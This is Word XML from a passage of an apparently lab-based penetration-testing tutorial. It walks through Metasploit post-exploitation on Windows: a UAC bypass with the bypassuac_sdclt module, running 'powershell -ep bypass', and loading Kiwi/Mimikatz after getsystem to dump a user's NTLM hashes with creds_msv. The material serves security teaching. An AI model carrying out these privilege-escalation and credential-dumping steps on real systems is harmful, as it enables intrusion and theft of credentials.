    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NtTokenIntegrityLevel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 67 shows that we are currently performing operations in the context of integrity level </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000560">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's background the currently active channel and session to search for and leverage UAC post-exploitation modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000561">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4681538" cy="1538005"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="533" name="image512.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image512.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4681538" cy="153800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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for UAC bypass modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000563">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5323676" cy="3967163"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="419" name="image399.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image399.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5323676"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pacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The search yields quite a few results. One very effective UAC bypass on modern Windows systems is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/local/bypassuac_sdclt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which targets the Microsoft binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sdclt.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This binary can be abused to</w:t>
      </w:r>
      <w:hyperlink r:id="rId124">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId125">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">bypass UAC by spawning a process</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with integrity level </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000565">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the module, we'll activate it and set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> options as shown in the following listing. Setting the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for post-exploitation modules allows us to directly execute the exploit on the active session. Then, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to launch the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000566">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="7632700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="375" name="image381.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image381.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/local/bypassuac_sdclt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000568">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 70 shows that our UAC bypass post-exploitation module created a new Meterpreter session for us.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000569">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's check the integrity level of the process as we did before.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5246201" cy="3867392"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="574" name="image556.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image556.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId127"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5246201" cy="3867392"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Import-Module NtObjectManager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NtTokenIntegrityLevel</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jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3708400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image44.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12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jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000572">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiwi:</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Besides being able to background an active session and execute modules through it, we can also load extensions directly inside the active session with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">load</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000575">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One great example of this is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a Meterpreter extension providing the capabilities of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because Mimikatz requires SYSTEM rights, let's exit the current Meterpreter session, start the listener again, execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the bind shell, and enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000576">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3136900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="284" name="image273.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image273.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12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Now, let's enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">load</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as argument to load the Kiwi module. Then, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the commands of the Kiwi module. Finally, we'll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds_msv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve</w:t>
      </w:r>
      <w:hyperlink r:id="rId130">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId131">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId132">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId133">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NTLM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5321332" cy="6719888"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="426" name="image420.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image420.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5321332" cy="6719888"/>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="557" name="image538.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image538.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13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Listing 73 shows that we could successfully retrieve the NTLM hash of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ry7a9yveemk4" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000582">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
